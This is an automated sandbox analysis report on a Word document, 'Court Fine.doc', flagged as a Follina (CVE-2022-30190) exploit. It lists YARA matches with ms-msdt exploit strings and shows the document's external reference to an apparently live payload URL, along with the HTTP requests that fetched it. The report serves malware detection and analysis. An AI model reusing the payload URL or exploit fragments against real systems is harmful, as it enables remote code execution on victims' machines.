Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Court Fine.doc

Overview

General Information

Sample Name:Court Fine.doc
Analysis ID:671073
MD5:730768c4f029608adf0032e95e8e8a1d
SHA1:c071befaa2d7548d53dfb0f1f611c6fd1b174f46
SHA256:94fabeeeffae82a107913815c2b62e4311aeef432197e0d2d6af40a7a65cd5f1
Tags:doc
Infos:

Detection

Follina CVE-2022-30190
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2564 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x38:$a1: <Relationships
  • 0x2bc:$a2: TargetMode="External"
  • 0x2b4:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x26d:$olerel: relationships/oleObject
  • 0x286:$target1: Target="http
  • 0x2bc:$mode: TargetMode="External

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x73d5:$a: PCWDiagnostic
  • 0x73c9:$sa3: ms-msdt
  • 0x7448:$sb3: IT_BrowseForFile=
sslproxydump.pcapEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
  • 0x73b8:$re1: location.href = "ms-msdt:
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wellcome[1].htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x194c:$a: PCWDiagnostic
    • 0x1940:$sa3: ms-msdt
    • 0x19bf:$sb3: IT_BrowseForFile=
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wellcome[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x192f:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wellcome[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31E8062F.htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x194c:$a: PCWDiagnostic
      • 0x1940:$sa3: ms-msdt
      • 0x19bf:$sb3: IT_BrowseForFile=
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31E8062F.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x192f:$re1: location.href = "ms-msdt:
      Click to see the 4 entries

      Sigma Signatures

      No Sigma rule has matched

      Snort Signatures

      No Snort rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: Court Fine.docVirustotal: Detection: 40%Perma Link
      Source: Court Fine.docReversingLabs: Detection: 43%

      Exploits

      barindex
      Yara detected Microsoft Office Exploit Follina CVE-2022-30190
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wellcome[1].htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31E8062F.htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F669AB9.htm, type: DROPPED
      Detected suspicious Microsoft Office reference URL
      Source: document.xml.relsExtracted files from sample: https://akmalreload.com/struk/wellcome.html!
      Source: unknownHTTPS traffic detected: 104.21.73.122:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.21.73.122:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.21.73.122:443 -> 192.168.2.22:49175 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.21.73.122:443 -> 192.168.2.22:49177 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.190.5:443 -> 192.168.2.22:49182 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.190.5:443 -> 192.168.2.22:49183 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.190.5:443 -> 192.168.2.22:49185 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 104.21.73.122:443 -> 192.168.2.22:49171 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.73.122:443
      Source: global trafficDNS query: name: akmalreload.com
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.73.122:443
      Source: global trafficHTTP traffic detected: GET /struk/wellcome.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: akmalreload.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /struk/wellcome.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: akmalreload.comIf-Modified-Since: Wed, 20 Jul 2022 22:09:18 GMTConnection: Keep-Alive
      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: unknownHTTPS traffic detected: 104.21.73.122:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.21.73.122:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.21.73.122:443 -> 192.168.2.22:49175 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.21.73.122:443 -> 192.168.2.22:49177 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.190.5:443 -> 192.168.2.22:49182 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.190.5:443 -> 192.168.2.22:49183 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.67.190.5:443 -> 192.168.2.22:49185 version: TLS 1.0
      Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
      Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
      Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
      Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
      Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
      Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
      Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
      Source: ~WRF{697ED1F7-F1B9-4514-A3EE-C4B3306C8B08}.tmp.0.drString found in binary or memory: https://akmalreload.com/struk/wellcome.html
      Source: ~WRF{697ED1F7-F1B9-4514-A3EE-C4B3306C8B08}.tmp.0.drString found in binary or memory: https://akmalreload.com/struk/wellcome.htmlyX
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2A788D5B-3466-495B-88B0-2FA2AEAC79CB}.tmpJump to behavior
      Source: unknownDNS traffic detected: queries for: akmalreload.com
      Source: global trafficHTTP traffic detected: GET /struk/wellcome.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: akmalreload.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /struk/wellcome.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: akmalreload.comIf-Modified-Since: Wed, 20 Jul 2022 22:09:18 GMTConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 104.21.73.122:443 -> 192.168.2.22:49171 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: document.xml.rels, type: SAMPLEMatched rule: Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents Author: ditekSHen
      Source: sslproxydump.pcap, type: PCAPMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: sslproxydump.pcap, type: PCAPMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: document.xml.rels, type: SAMPLEMatched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
      Source: document.xml.rels, type: SAMPLEMatched rule: INDICATOR_OLE_RemoteTemplate author = ditekSHen, description = Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wellcome[1].htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\wellcome[1].htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31E8062F.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31E8062F.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F669AB9.htm, type: DROPPEDMatched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F669AB9.htm, type: DROPPEDMatched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
      Source: ~WRF{697ED1F7-F1B9-4514-A3EE-C4B3306C8B08}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: Court Fine.docVirustotal: Detection: 40%
      Source: Court Fine.docReversingLabs: Detection: 43%
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: Court Fine.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Court Fine.doc
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$urt Fine.docJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR730D.tmpJump to behavior
      Source: classification engineClassification label: mal72.expl.evad.winDOC@1/18@15/2
      Source: ~WRF{697ED1F7-F1B9-4514-A3EE-C4B3306C8B08}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{697ED1F7-F1B9-4514-A3EE-C4B3306C8B08}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{697ED1F7-F1B9-4514-A3EE-C4B3306C8B08}.tmp.0.drOLE document summary: edited time not present or 0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: ~WRF{697ED1F7-F1B9-4514-A3EE-C4B3306C8B08}.tmp.0.drInitial sample: OLE indicators vbamacros = False

      Persistence and Installation Behavior

      barindex
      Contains an external reference to another file
      Source: document.xml.relsExtracted files from sample: https://akmalreload.com/struk/wellcome.html!
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
